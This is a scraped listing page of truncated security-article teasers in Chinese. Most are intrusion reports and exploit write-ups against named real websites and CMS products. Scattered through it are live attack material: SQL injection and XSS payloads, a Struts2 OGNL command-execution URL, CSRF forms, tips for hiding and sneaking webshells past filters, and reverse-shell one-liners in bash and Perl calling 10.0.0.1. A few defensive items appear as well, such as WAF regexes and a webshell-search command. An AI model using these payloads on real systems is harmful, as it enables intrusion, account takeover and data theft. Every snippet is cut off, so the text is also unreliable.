UNCC动力互联建站存在多种高危漏洞,基本通杀所有程序。 (这次报个礼包求邀请码) 后台入口: /manage/login.aspx 伪造cookie即可绕过登陆 [{ do...
登陆用户名未过滤,数据库错误可以回显示。 修复方案: 过滤...
wordpress 后台修改模版 anti-csrf token可以bypass。真的可以结合社工拿shell了。童叟无欺。影响版本 3.5及一下版本,3.5.1则不存在这个漏洞。 wo...
最近的那个dedecms变量覆盖漏洞,最后可以控制全局变量,但不能完全控制 $GLOBALS[$v1] .= $v2;注意这里是递加的,是在已初始化的全局变量内容...
修改邮箱处未验证token,可通过一个精心构造的表单来修改用户的邮箱。由于邮箱需要唯一性,所以可以通过一个数组来随机抽取邮箱。 P...
解析绕过。 这样就会被检测 如果这样就不会被检测 多一个.即可绕过 修复方案: 你懂的。...
某晚无意中寻得百度旗下某站后台一枚,登陆之,寻上传点,有过滤,解析漏洞,得shell 有漏洞的是百度旗下原创文学网站---多酷(http://yc...
位置:搜狐视频个人首页发布影评输入框位置。 原因:啥都么过滤。 修复方案: 过滤。...
1)图虫网接口问题,没有进行权限判断: http://tuchong.com/api/post/modify/ post_id=目标文章的idtitle=wooyuncontent=wooyuntags%5B%5D=tags%5B%5D=wooyunis_original=0is_...
可以看到USERJIHUO.ASP的id没有进行任何过滤 进一步证实,而且是数字型注入,被调用的文件中也没有过滤代码,构造得到的注入点: /user/US...
内容 ############# 【000】 简介 【001】 过滤规避(Mysql) 【0x01a】 绕过函数和关键词的过滤 【0x01b】 绕过正则表达式过滤 【002】 常见绕过技...
灯鹭社会化评论框 http://www.denglu.cc/ 灯鹭社会化评论框要是直接script是无效的 但是可以发现其允许插入图片 纯支持html 然后各种试on~ 目前可...
之前4月13日在360的漏洞平台提交过一次,当时给出了能计算出db_pscode的利用工具。db_pscode是安装的时候随机生成的一个字符串常量,保存在...
册用户,发表文章,抓包改包,打死 先看看上传目录有没执行权限,发现没有,看来要在包里做手脚 抓包发现有路径参数,直接改包丢上去...
在新网选好域名,结账 原来的价格是399元,下一步,填写域名信息 选择填写其他DNS,这一步很关键 接下来付款 将http://www.xinnet.com/account/...
目前泄漏的用户信息已经有5000条左右,数量还在不断增加中,包括人人网的登录邮箱帐号,姓名,手机号,qq号,ip地址等。 危害流程:x...
首先是个反射型xss漏洞,结果挖着挖着, 挖出个小清新来!!!数据库报错! 果断上报错语句 就报出来了个美美,然后。。。。。。!!...
存在一个注入点~~ 可脱 newcms 裤子。。。 详细说明: 正在逛着 突然看到 http://plus.aili.com/vote/vote_end.php?vid=31 这个投票~~。 习惯就加 单 哦也...
工作需要,要进行漏洞演示,网上随便找找,发现webshop看起来不错,于是下载测试,果然漏洞很多,各种各样的漏洞都有很方便演示:)...
某个地方未过滤导致存储型XSS,直接把xss代码带入了数据库。 其实这也是一次fuzz测试的结果。 在测试的时候,测试了好几个地方,包括了...
1 前言 近年来,随着Web2.0的大潮,越来越多的人开始关注Web安全,新的Web攻击手法层出不穷,Web应用程序面临的安全形势日益严峻。 跨站脚...
1、防SQL注入 百度一下 360.cn 写过一个防SQL注入的PHP脚本。 用过来 GPC 进行检测。部分代码: $getfilter=|(and|or)\\b.+?(||=|in|like)|\\/\\*.+?\\*\\/|\\s...
首页视频处未过滤,在视频链接后加入代码即可执行 POC: 在视频链接中填入 http://v.youku.com/v_show/id_XNTM2OTY3NjQw.htmlscirptalert(/xss/)/script 至于能做...
新网其实还可以劫持域名,前几天pudn.com被黑(非域名劫持) 那么今天我们就以pudn.com为虚拟目标 本来跟基友们说是以新浪为演示 但失败了...
页面有参数没有过滤,可xss。 cookie是httponly的不好拿,但是这个链接被信任且广泛使用,用来钓鱼,挂马或者干点别的什么的,还是有很大...
当我们使用传统的mysql_connect 、mysql_query方法来连接查询数据库时,如果过滤不严,就有SQL注入风险,导致网站被攻击,失去控制。虽然可以...
http://pokersc.qipai.sina.com/teampro/index.do?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean(false)%2c+%23_membe...
本文准备说明以下几个问题: 1. 关于重复编码的问题 2. 关于编码的多种形式的问题 3. 关于编码的几个常见问题 【说明】 本文所述编码是指...
新网数码三个重要分站可拿shell,涉及域名管理、注册的重要接口。 漏洞很低级,对安全重视一些即可避免。 FCKeditor任意文件上传 新网主站...
一般情况下论坛删帖是要给钱的。对是要给钱的。但是我删帖是免费的。想删那个 删那个。没事可以天天删 详细说明:http://i.jstv.com/ 当注...
Starting this post with that image seemed appropiate. This one is really easy and lots of servers use this crap called SolusVM. /centralbackup.php : ?php if ($_POST[delete]) { $xc =...
华安保险端口为8899的JBoss服务爆出jboss配置漏洞,虽然不能直接通过 IP/jmx-console访问,但, 如给IP/jmx-console发送HEAD请求时, 可以绕过认证从...
ecshop最新2.7.3后台低权限用户登录以后可进行注射提权 问题出在admin/shopinfo.php的108行 if ($_REQUEST[act] == edit){ /* 权限判断 */ admin_priv(shopinfo_m...
据有关报道指出,某政府网站被黑后,有关安全检测技术人员在经过详细排查后,确认是WebShell木马后门。更值得警惕的是黑客对木马文件的...
开放Web应用安全项目(OWASP)很快会发布今年的10大Web应用安全漏洞清单。这个清单与去年并没有太大差别,这表明负责应用设计与开发的人仍...
未作过滤导致注入 修复方案: 你懂得...
# 标题 : LibrettoCMS 2.2.2 Malicious File Upload # 发现者 : CWH Underground # 官网 : http://libretto.artwebonline.com/ #下载地址 : http://jaist.dl.sourceforge.net/project...
GOOGLE现在XSS已经涨到3100~7500了,然后某著名日本猥琐流就发了一个accounts.google.com域下的XSS,在微博上看到@xisigr在新浪微博上发了链接,就...
一个分析报告,安全宝能够拦截,发一下吧。博客没啥文章了,最近略忙。。。 略忙。。。 01漏洞分析 漏洞在payment.php文件 elseif($_REQUEST[...
用户中心好友分组位置: xx=x 页面上有长度检测,不过没关系,抓包构造: name=addGroupgroupName=x onmouseover=var h=document.getElementsByTagName(head)[0];v...
JSONObject json = null; json = new JSONObject(); json.put(code, 200); json.put(info, tester); json.put(msg, success); System.out.println(json); // 输出:{code:200,info:tester,msg...
www.2cto.com:可以参考本文:http://www.2cto.com/Article/201107/95721.html phpcms通过后台管理编辑首页模板,插入php一句话木马,更改基本设置生成ind...
几个bypass如下: img src=5 onerror=eval(alert(lalala~))/img变形如: %3Cimg%20src=%225%22%20onerror=eval%28%22\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29%22%29%3E%3C/img%...
# 标题 : Elemata CMS RC3.0 SQL Injection# 漏洞作者 : CWH Underground# 网站 : www.2600.in.th# 开发者网址 : http://www.elemata.com/# 下载地址 : http://jaist.dl.source...
悠易互通是中国领先的受众营销传播平台,依托庞大的专有受众数据库和先进的广告技术,帮助广告主推送相关广告信息精准到达目标受众...
当用户在http://2sc.sohu.com/搜狐二手车里发布出售信息的时候。对车况介绍:没有任何过滤。后台直接输出 导致后台直接沦陷...
主要是某系统为授权可访问,导致可执行任意命令,权限还是root,数据库未做访问限制,数据量很蛮大的。。 详细说明:此问题是由于他们...
我们找存储型的时候,从一个地方输入数据,需要检测很多输出的点,从而可能会在很多点发现存储型XSS。 至于如何根据输出来构建存储型...
一点心得: 昨天在一个mysql数据库的console里面直接导出一句话的时候 用这种网上说的直接写出不成功 select 0x3c3f706870206576616c28245f52455155455...
图虫网一个地方未过滤导致clickjacking 详细说明:在我的主页里发表一篇文字,随便写入点东西,发表后经过查看发现在分享到豆瓣这里时,...
wordpress3.5.1后台修改主题模版处防CSRF不严,前台评论可加入超链接,可写上诱惑性东西 骗取管理员点击后写入一句话木马 进入后台-外观-编...
#!/usr/bin/python# 组织声明:# http://packetstormsecurity.com/files/119582/PHP-Charts-1.0-Code-Execution.html# infodox - insecurety.netimport requestsimport randomimport threadin...
常在河边走哪有不湿鞋?extract + global早晚是要出问题的.. 直接进入正题: \include\common.inc.php -Line12 require GAME_ROOT../include/global.func.php;error_r...
# 标题 : PodHawk Arbitary File Upload Vulnerability# 漏洞发现者: CWH Underground# 网站 : www.2600.in.th#开发者官网: http://podhawk.sourceforge.net# 下载: http://jais...
1 漏洞位置:360论坛任意板块,发帖、回复的富文本编辑器中。 2 利用代码 [img]javascript:任意js代码[/img] 3 漏洞危害: 通杀360论坛所有板块...
我们很难保证一个Web程序的安全性,因为鬼知道明天会有什么新的漏洞出现,鬼知道某个模块是不是一个毫无安全意识的程序员编写的。 大...
正方教务低版本提权jwc01后,可再提完整权限 正方教务系统低版本爆提权漏洞:(http://www.2cto.com/Article/201304/200666.html)和这个类似,先用这个登...
member/getpassword.php与admin/admin/getpassword.php文件中 if($p){ $array = explode(.,base64_decode($p)); $sql=SELECT * FROM $met_admin_table WHERE admin_id=.$array[0].; $sqlarra...
漏洞-1 漏洞类型:存储型xss 代码文件:LstBook.Asp 详细代码: ------------------------------------------------ If action=addbook ThenIf Trim(Request(xm))= Then Cal...
第一次发csrf,严谨是王道。各位看官就别喷哈 0x1:首先还是很感谢我的两位朋友:@ms @jason协助我测试该漏洞,没有你们就没有这次漏洞的真相...
云邮是新网互联自主研发的第二代企业邮箱系统;在兼具第一代企业邮箱以域名邮箱为核心特征及系列功能的同时,融入了统一通信概念和...
(这个是对于新手的,大牛请绕过)首先弄个简单的实例,让大家明白 我的数据库和表数据如下 mysql use testDatabase changedmysql select * from test;+-...
作者:Pax.Mac Team核心成员 1.weblogic 后台页面:http://127.0.0.1:7001/console(http为7001,https为7002) Google关键字:WebLogic Server Administration Console in...
云邮是新网互联自主研发的第二代企业邮箱系统;在兼具第一代企业邮箱以域名邮箱为核心特征及系列功能的同时,融入了统一通信概念和...
问题出在http://work.china.alibaba.com 是一个微博,我们分享一张图片,上传,然后抓包,发现图片地址可控,如图 由于没有过滤双引号,导致闭...
很久之前发现的,一直在研究,想着发出来吧,早点修复对厂商也是好事情。 最开始发现的时候,只能用来弹个框框,甚至跳转都写不了。...
很多人在做开发的时候并没有注意到SQL的查询是可以被改掉的,其实SQL却是最不安全的因素之一,通过SQL,更有可能去直接执行系统命令,...
array_walk函数原型:array_walk(array,function,userdata...),具体可见: http://www.2cto.com/shouce/w3school/php/func_array_walk.asp.html 注意点: 1、函数的第一个参...
标题: Monkey CMS - Multiple Vulnerabilities 作者: Yashar shahinzadeh Mormoroth 测试系统平台: Linux Windows, PHP 5.3.10 影响所有版本 摘要: ======== 1.本地路径泄...
众所周知的wordpress系统的默认后台登录界面地址为域名/wp-login.php 直接将后台暴露给别有用心的访客是非常不安全的。因为现在的密码穷举器...
过滤字符串中的@,但是始终没有修复根本问题 官方的修复代码加了一个if判断 if(strpos($clean, @) !== false) { return -3; } 过滤字符串中的@,但是始...
在进行sql注入攻击时经常会遇见 无回显的情况 这时我们就不能成功进行攻击了么? 答案是否定的 攻击可能是成功进行了的 但是 应用程序...
某常用页面的参数未过滤,附XSS利用过程。 安全意识高的人越来越多了,看到weibo.com的域名也不点,反射型的XSS真心难,求持久化思路。...
mssql显错模式注入(字符型注入) 2.1 基本信息 2.1.1 判断存在注入 http://yjsc.ahau.edu.cn/web/InfoKindList.aspx?kind=0103 根据加单引号的错误回显,发现...
金蝶网站用户登录的地方http://id.kingdee.com/存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限)...
腾讯单点登录系统某个地方设计缺陷导致可通过web获取到clientkey.黑客可以通过获取到的clientkey获取客户端QQ所有相关服务的权限. http://xui....
好久没玩审计了,所以下载了源码找了个xss来玩玩....!!! 漏洞类型:持久型xss 注册处存在存储xss 具体代码: rs(username)=trim(request(username))rs...
简介 BeEF是目前欧美最流行的web框架攻击平台,全称是 the Browser exploitation framework project,他的牛逼之处就在于集成了很多好使的payload,并可...
当鸡肋的xss与鸡肋的csrf结合的时候。。。。 0x01.图虫网相册处相册名称未进行转义,可造成存储型xss,盗取用户cookies. 0x02.图虫网创建相册...
前言 有很多软件可以做XSS的检测,如XSSer等等。本文实现的着重点不是XSS的检测,而是XSS触发之后的行为检测,呃,直接点说就是拦截发送...
网易自己开发的Discuz插件具有XSS漏洞 可以插入各种事件以及HTML Tag 详细说明:网易自己开发了DB插件,可以访问网易自己的技能或者物品库...
删除个性域名处未过滤,可以将hidden中的域名修改成他人的/其他小组的,删除掉他人/其他小组的个性域名。 使用调试工具,显示出了要删...
邮箱:root@cnseay.com 绕过描述: 在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。 测试方法: 请求URL测试...
前言 在做测试的过程中,居然还发现了一站点现在还存在PHP代码注入的漏洞,真是很难见到的漏洞。现在说说这个漏洞产生的原因以及利用...
单位某站用的dedecms,今天被某黑阔getshell了 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功...
云邮是新网互联自主研发的第二代企业邮箱系统;在兼具第一代企业邮箱以域名邮箱为核心特征及系列功能的同时,融入了统一通信概念和...
今天上百度准备看一集火影睡了,没成想tudou被劫持了。-_-||! 打开酷狗音乐吧,听听现场主播哼几首就睡了,结果木钱钱。-_-||! 那就进去看...
突然发现的, insight-labs提交了的一个,官方回复已经修复,但是修复不完整。 详细说明:在测试其他网站时,发现了这个flash文件,看了下...
这个可不是CSS样式,而是货真价实的XSS哦~ 地址:http://item.taobao.com/item.htm?spm=a230r.1.0.224.BEYcmdid=2703000597 在商品标题栏输入: lt;scriptgt;alert(...
bluecms最新版本即v1.6sp1,处理登录验证时对变量进行单引号转义,但可以用gbk 双字节编码闭合单引号再注释从而进入后台 bluecms验证登录代码...
阿里云的云主机购买逻辑设计不严密,经过base64编码的数据可以被篡改,并且后端会接受篡改的数据,并可以伪造出超级主机。本需要花2...
存储型XSS 能获取到管理员cookies 论坛发帖处,提交贴子过滤不严导致XSS 获取管理员cookies POST http://xxxx/cmseasy/bbs/add-archive.php?cid=1 title 修复方...
后来继续看了看,找到个各版本通用的不需登陆的注入点加上爆路径,就算sa不能执行命令也恢复不了组件了,只要管理员不是太变态,就可...
?phpif (isset($_POST[name])){$str = trim($_POST[name]); //清理空格$str = strip_tags($str); //过滤html标签$str = htmlspecialchars($str); //将字符内容转化为html实体$...
漏洞缺陷:存储型xss 漏洞文件:links.php 漏洞处在申请友情链接处的网站名称和logo地址处,因为网站名称webname是post获取的并且没做过滤所以...
XSS 全称为 Cross Site Scripting,用户在表单中有意或无意输入一些恶意字符,从而破坏页面的表现! 看看常见的恶意字符XSS 输入: 1.XSS 输入通...
#################################################### 标题: Machform form maker - Multiple Vulnerabilities # 作者: Yashar shahinzadeh # 开发者: http://www.appnitro.com # 已测试...
#!/usr/bin/python## 标题: C.P.Sub = v4.5 Misconfiguration and Improper Authentication# Date: 2013/6/27# 作者: Chako# 开发者: http://www.cooltey.org/ping/php.php# Software Dow...
http://bj.bbs.house.sina.com.cn:80/bbs/post/show?pid=5742081790378527840 and 1=1 http://bj.bbs.house.sina.com.cn:80/bbs/post/show?pid=5742081790378527840 and 1=2 Current DB: bbs_hou...
企业qq群发信息的时候会附带一个 2周内不再接收此企业的群发消息 的链接: http://crm2.qq.com/page/portalpage/reject_msg.php?k=b66b5cf124e37a6c0b67999373c...
正方教务管理系统C/S客户端与服务器的Socket传输不加密,导致数据库暴露在公众之下 详细说明:可以通过正方教务管理系统的C/S客户端进行...
HTML5 is one of the promising new key technologies that powers the web. Though it is still under development, HTML5 is high in demand especially given the fact that the use of smart...
樱桃企业网站管理系统V3.1 SQL注入及任意管理员帐号密码修改.删除漏洞 程序下载地址:http://down.chinaz.com/soft/31227.htm 漏洞文件:news_category...
/AdminManage/WebManagement/UsersManagement/UsersAdd.aspx /AdminManage/FileManagement/SelectFile.aspx 修复方案: 厂家懂的!...
随着互联网电子商务的日益普及,在线支付的门槛已经非常低,普通网民通过2、3次操作即可完成一次在线支付。与此同时,传统行业越来越...
标题: ====== Mobile Atlas Creator 1.9.12 - Persistent Command Injection Vulnerability Date: ===== 2013-06-11 Common Vulnerability Scoring System: =================================...
影响产品: OpenX 影响版本:2.8.10 and probably prior 已测试版本: 2.8.10 缺陷类型: PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79] 风险等级: High CVSS...
Lmy分享,搭建过程遇到的问题和解决方法如下: ======================================= 前奏: 1 、用命令解压xssplatform.zip,然后修改config.php里面的数...
漏洞出现在拼范网的发布作品处,注册账号进入,然后发布作品,创建影集处以及照片描述处可插入xss代码,发布时给照片设定一个金额,...
赶集网的婚恋交友模块,你懂的 第一次提交,审核员说我只能自己日自己, 后来发现由于没上传头像,预览自己的信息只能本人看,其他人...
问题文件: pro_addnews.asp login.asp login.asp 代码如下: If ytss_use And ytss_Pword Thenif ytss_use=lty696 and md5(ytss_Pword)=ae68b0f59186f263 thenSession(admin_User) = lt...
假如你的账户密码泄露了 那你就危险了 在后台能直接拿webshell 后台为方便站长有个数据库工具 在哪里执行 Select %execute request(value)% into ou...
1. 任意用户信息修改 先注册两个用户,用户的userid分别是5855480和5855481。 然后使用5855480这个用户登录,填写需要修改的目标用户5855481信息...
########################################### Title: B2Bbuilder B2B网站管理系统之注入漏洞# Time:2013/03/30# Team:c0deplay####################################### 源码下载...
http://tieba.baidu.com/p/2337649856 其中一个帖子 点进去就会自动转发帖子给所有自己i的贴吧 详细说明: 跨站脚本地址http://xss.retaker.me/1.js //init...
淘宝旅行,我的旅行空间,展示我的动态,这里的问题。 动态输出内容确实转义了,但是有一个dom型的xss、同时也是持久型的。 还挺特殊的...
权限验证不严,导致所有用户收藏的帖子全部被删除......当然我没有那么调皮 注册2个账户 USERA先登入系统,随便收藏5个帖子。如下: 我们...
(1)mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集 使用方法如下: $sql = select count(*) as ct...
在/admin/includes/set_page.php中: 产生读任意文件的地方: elseif ($action==get_page_data){require(PBBLOG_ROOT . /includes/json.class.php);$json = new JSON;$file=$_POST...
由于离线下载对种子内的文件名没有严格过滤,造成了XSS的发生 漏洞证明:用这个种子在离线空间创建任务,即可出现xss: http://pan.baidu....
新东方问吧存在SQL注入漏洞,夜深了,不深入了,注意休息。 听说这个厂商很好,会给高分。 新东方问吧老师的课程接口,在处理客户端的...
漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露、cookie伪造、CSRF(跨站请求)等。这些漏...
vip参数可以修改,{您当前VIP等级为 VIP0 ,拥有永久赠送凤凰币特权。 本次充值您将共计获得: 10 凤凰币 ( 10 凤凰币 + VIP0赠送的凤凰币数...
传左shell上去但系被狗拦左,shell过狗仲系好容易噶,但系过左狗之后狗狗仲系拦菜刀提交的数据包 然后骚总想到了个方法,就系在一句话解...
利用php中的一个自动在文件中增加页眉和页脚的功能,隐藏一句话。 在站点的某一目录(如:根目录)下编辑文件php脚本文件,名称为:...
影响产品: Kasseler CMS 缺陷版本: 2 r1223 and probably prior 已测试版本: 2 r1223 缺陷类型: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request ...
0x00 Chrome 插件 -------------------------- 这个想法是昨天看到@紫梦芊 的帖子想起来的。 想法如下: Chrome插件是可以通过manifest.json的控制,向指...
0x00 背景 从IE8 beta2 开始,微软加入了xss Filter。如同大部分安全产品一样,防护的对策就是利用规则去过滤攻击代码,基于可用和效率的考虑...
大街网存在一处持久型xss,可执行外部js 分享状态处,过滤不严格,导致存储型xss的产生,我们先添加一张图片,然后点击发表新鲜事,抓...
之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。 下面分享一下我的经验,本人菜鸟高手勿喷!! 用户密码 admin:d...
店铺地址是这个,重现可以来这里看。 http://item.taobao.com/item.htm?spm=a230r.1.14.69.zk34BWid=25101676408_u=k3jfumt58e4 访问被强行调到天猫,带有淘宝客...
SQL注入:http://wap.uc.cn/index.php?action=BrandPicApibrand=nokia 此站为UC的WAP主站,数据目测很多(超50个表),用Safe3 SQL注入工具测试成功。 如图1 爆路...
云邮是新网互联自主研发的第二代企业邮箱系统;在兼具第一代企业邮箱以域名邮箱为核心特征及系列功能的同时,融入了统一通信概念和...
为为商城某处XSS,盗取COOKIE,直插后台各种信息.... 插入xss 随便买个东西 用已经写好的地址 商家浏览我们的订单后 ~~ 信息量大... 修复方案...
Injection Bypass 活动说有礼物,啥礼物? 求礼物来的! http://secaqb.anquanbao.org/sqlin.php?id=-9.union%0Bselect~1,database%28%29,3,4 修复方案: 攻城尸...
套用某人的一句话:可改首页噢 1、首先打开网站一看,asp站,无他直接仍御剑大牛的想念初恋中扫啊扫 edit编辑器,吼吼。。。你懂得 2、...
kangle vhms是一款专为虚拟主机商研发的免费虚拟主机管理系统; 支持管理多个easypanel虚拟主机控制面板; 支持非自动化业务; 带一个销售前...
修改邮箱处无token,可劫持用户帐号。 POC: form method=POST action=http://www.19lou.com/util/email/active/sendchange name=vipcsrf target=hidden_frameinput type=text nam...
随着移动端与PC的渐渐融合,也为了保证用户的可靠性,流量的质量,越来越多的网站实行了一个策略,那就是将手机验证码发至用户的手机...
好久没写文章了,之前写的文章都是实际解决方案的文章往往看起来比较晦涩,本文就说说与我工作有关的故事吧。 先声明一下个人观点:...
一.CSRF Example : 在登陆状态下进入了攻击网站向安全站点发送了请求。 Solution: 在view 中使用 @Html.AntiForgeryToken(), 在Action 上加上 [ValidateAnti...
今天无意发现了个PostgreSQL环境,线上学习了下,一般的数据注射(读写数据库)差异不大,不做讨论,个人比较关心PostgreSQL的文件读取和命...
百度搜索和新浪视频组合产生反射型XSS(作用域在www.baidu.com) 无意间发现的这个漏洞,希望尽快修复,同时这里感谢@blast帮助分析!,好了...
正方教务系统在开启了登录时验证码验证后, 可通过更改登录页面地址来绕过验证码, 从而可以实现编写脚本暴力破解jwc01的密码, 或者扫...
0X00前言 0X01演示 0X02总结 本文章主要写给对此不了解或者不知道的基友们,会的大牛看到勿喷再次谢过了~~ 0X00前言 昨天看了一下08sec的文章...
# 标题: OpenNetAdmin Remote Code Execution # 漏洞作者: Mandat0ry (aka Matthew Bryant) # 开发者官网: http://opennetadmin.com/ # 下载地址: http://opennetadmin.com/downl...
前段时间看py的时候 ,去这位朋友的博客, 今天去博客的时候看有什么资料更新的时候,看他发了一个获取IP的。 因为我自己就是搞web安全的...
0x00 背景 在Browser Security-同源策略、伪URL的域这篇文章中提到了浏览器的同源策略,其中提到了XMLHttpRequest严格遵守同源策略,非同源不可请...
地址: http://fatezero.07073.com/Default_Search.html 搜索框提交的POST参数searchBox未过滤 修复方案: 过滤searchBox...
在手机商店某处上传点修改审查元素可上传任意格式文件!但是菜鸟不会理利用。。。 存在与手机diy锁屏这的上传点 修改为php或者任意格式...
查看用户微信名片 url:http://weixin.qq.com/cgi-bin/showcard?t=weixin_cardmuin=你的QQ号码fuin=你/你好友的QQ号码 #高版本QQ客户端访问会提示登录,低版本...
本文对WAF做了简单的介绍,随后讨论了一些主流的WAF绕过技术,并结合真实案例演示了如何尝试绕过WAF的防护,成功攻击其后端的Web应用,...
( \\s|\\S)*(exec(\\s|\\+)+(s|x)p\\w+)(\\s|\\S)* //Exec Commond ( \\s|\\S)*((%3C)|)((%2F)|/)*[a-z0-9%]+((%3E)|)(\\s|\\S)* //Simple XSS ( \\s|\\S)*((%65)|e)(\\s)*((%76)|v)(\\s)*((%61)...
前段时间测试人员报了一个flash的xss bug,经分析用了Loader.loadBytes且没做数据流格式校验的程序都会中招,自测方法只需一行代码: External...
?php //Code By Safe3 function customError($errno, $errstr, $errfile, $errline) { echo bError number:/b [$errno],error on line $errline in $errfilebr /; die(); } set_error_handler(cu...
城通网盘(400gb.com)VIP订单存在隐患,一键开通VIP+系统管理员 (不过貌似没什么权限) 城通网盘对VIP服务进行支付时,运用的是相对安全的订单...
0x00 背景介绍 随着网民越来越习惯于网上购物,出现了越来越多的电商网站,在线交易平台等。 其中肯定要涉及在线支付的流程,而这里面...
目录 版本下载 Struts结构 OGNL语法 Struts近期漏洞 S2-015 S2-014 S2-013 S2-012 S2-011 S2-010 版本下载 最近struts 2爆了一些很厉害的漏洞,于是乎就趋之...
问题发生在找回密码的地方 在发送成功的地方显示了完整的邮箱地址 第一步到一个商品评价下面找一个用户名称 发送邮件 好嘞 用户的邮箱...
!-- FluxBB 1.5.3 Multiple Remote Vulnerabilities 作者: FluxBB 官网 http://www.fluxbb.org 影响版本: 1.5.3 摘要: FluxBB is fast, light, user-friendly forum software for yo...
一句话查找PHP木马 # find ./ -name *.php |xargs egrep phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|spider_bc)) /tmp/php.txt # grep -r --include=*.php [^a-z]eval...
在前几期文章中我们针对常见Web安全漏洞的攻击与防范方法进行了分析和描述,并了解到Web安全漏洞对网站的安全运营以及企业敏感信息防...
1.resin 任意文件读取: http://t.stat.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://t.stat.youku.com/resin-doc/examples/ioc-periodictask/v...
COOKIES SPOOF AND SQL INJECTION 漏洞位于/admin/inc/SiteFun_Admin.asp中的CheckAdminLevel函数;可以自定义cookies值绕过,值得注意的是将SiteControl_CookieUser 值...
根目录下message.php页面存在关键字过滤不严谨的问题。 出问题的代码如下 if($_REQUEST[act] == add) //request获取的act变量只有这个if后面就没有判读...
[waraxe-2013-SA#106] - Multiple Vulnerabilities in Saurus CMS 4.7.1 =================================================== 作者: Janek Vind waraxe 介绍: ~~~~~~~~~~~~~~~~~~~~~~~~~~~...
修改url拿shell 查看源码看到是有参数的尝试在url后加参数绕过上传 22 和33应该是上传类型 不成功 二次上传 同一个解析上传两次 第一次是...
三处SQL注入,其中两处盲注 还有一个反射型XSS 漏洞证明:www.dianwoba.com/dianwoba/servlet/DianpingAction?fun=getDianpingListBySupidpage=1pagesize=1start=0supid=...
注:这一节主要是介绍Oracle和SQL注入工具相关,本应该是和前面的Mysql一起但是由于章节过长了没法看,所以就分开了。 0x00 Oracle Oracle Datab...
1. 两个反射型XSS。。 http://jiu.sohu.com/searchprice.php?q=%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://product.news.sohu.com/news/hooscargame/pt_main.php?photourl=%22%3E...
对会员发布信息没过滤,可直接插入xss 注册个用户,直接到会员管理后台 点发布相册 在公司名称写入script都行... 然后就等管理人员上来,...
博主测试的程序版本为:B2Bbuilder_v6.6 注入点点:http://192.168.1.1/?m=offers=offer_listid=1004 测试方法: http://192.168.1.1/?m=offers=offer_listid=1004+and%28s...
我们可以把OGNL作为一个底层产品,它在功能实现中的设计缺陷,是如何能够被利用并远程执行恶意代码的,而不是完全在struts2这个产品的功能设...
3g版腾讯微博服务端某接口控制不严导致可批量控制微博,通过对接口截包分析最后写了本次的批量利用脚本。 令附:控制腾讯某高管收听...
注:这一节主要是消除很多人把JSP当作了JavaWeb的全部的误解,了解MVC及其框架思想。MVC是用于组织代码用一种业务逻辑和数据显示分离的方法...
注册两个账户 USERA登入系统后随便收藏几个妹子的图片。在个人首页里点击图片收藏里的更多,即可查看到自己收藏的妹子,如下图: 鼠标...
作者:拿破仑 www.anying.org (暗影技术团队) 转载必须注明作者和团队网址。原文:http://www.anying.org/thread-9375-1-1.html 本来是有个这个洞的站的,...
部分DZ论坛启用点触验证码后验证码完全没有起作用。同时由于更改了登录逻辑,还会造成论坛登录密码明文传输。 详细说明:由于点触验...
CVE-2013-1966 描述: Apache Struts2的s:a和s:url标签都提供了一个includeParams属性。此属性允许使用的值包括none、get、all。当该属性被设置为get或a...
我的网站还有我给老师做的单片机网站相继被黑,从他那得知,他用的是啊D注入工具,先找我的网站是否存在可注入点,如果有,进行注入,...
本来是写今天的那个易想购物sql注入漏洞的,找一些request变量看看。发现link页貌似也有过滤不严的错误,就打开代码看看先,果然发现问题...
1. 个人主页中,关注的人所发表的状态中回复任意删除 步骤1:选定目标 步骤2:先删除下自己的回复,看下数据包 Pk字段的值就是要关心的...
exp: form action= method=post name=submit id=submit onsubmit=addaction();网址:input type=text value=http://localhost/manager/user.do?method=emailForCheckingAdmin name=doaction...
机锋网开发者分站任意文件上传,已shell。 选择立即申请 http://eagle.gfan.com/projecteagle.aspx 上传,抓包。 路径 修复方案: 我什么都不知道...
问题发生在订阅用户的接口上! http://i.youku.com/u/friends/follow_325973?__rt=1__ro= 或者 http://i.youku.com/u/friends/follow_UMTMwMzg5Mg==?__rt=1__ro= PS:ID是湖南电...
bash版本: bash -i /dev/tcp/10.0.0.1/8080 01 ,注意某些linux不支持 perl版本: perl -e use Socket;$i=10.0.0.1;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(tcp));if...
重置密码的链接没有进行严格的验证。重置密码链接组成如下: http://login.jingwei.com/resetPass?email=邮箱地址vc=a05e9dd6-e64d-4a5a-9364-60499d78c9aa 可以...
QQ空间有两个BUG可以结合利用: (1)URL里总是带着QQ号码,也就是说,可以通过来源referer得知当前用户的QQ; (2)日志的动态中图片如果是第三方网站...
60度 CMS 官方管理员无节操...
听朋友说simplog有很多漏洞,那我也下一个来看看,他的程序到底有多不安全。由于时间的问题自己就从代码里分析,测试这一部分就不写啦...
将大马写到一个txt文件里面,命名为dama.txt 再建一个文本文档,asp的就写入: !--#include file=dama.txt--保存为x.asp 两个文件传同目录下,访问...
www.2cto.com:老文章了 以下的文章主要向大家描述的是跨站脚本攻击和防御,网络上曾有过关于跨站脚本攻击和跨站脚本防御的文案,但是随着...
1.linux 上的后门脚本 1)perl写的 use strict; use Socket; use IO::Handle; if($#ARGV+1 != 2){ print $#ARGV $0 Remote_IP Remote_Port \n; exit 1; } my $remote_ip = $ARGV[0]; my...
判断是否为Oralce数据库: And 0(select count(*) from dual) 返回正常页面表示为Oracle数据库 猜解字段数量: 使用order by 或者group by逐个提交数字 知道回...
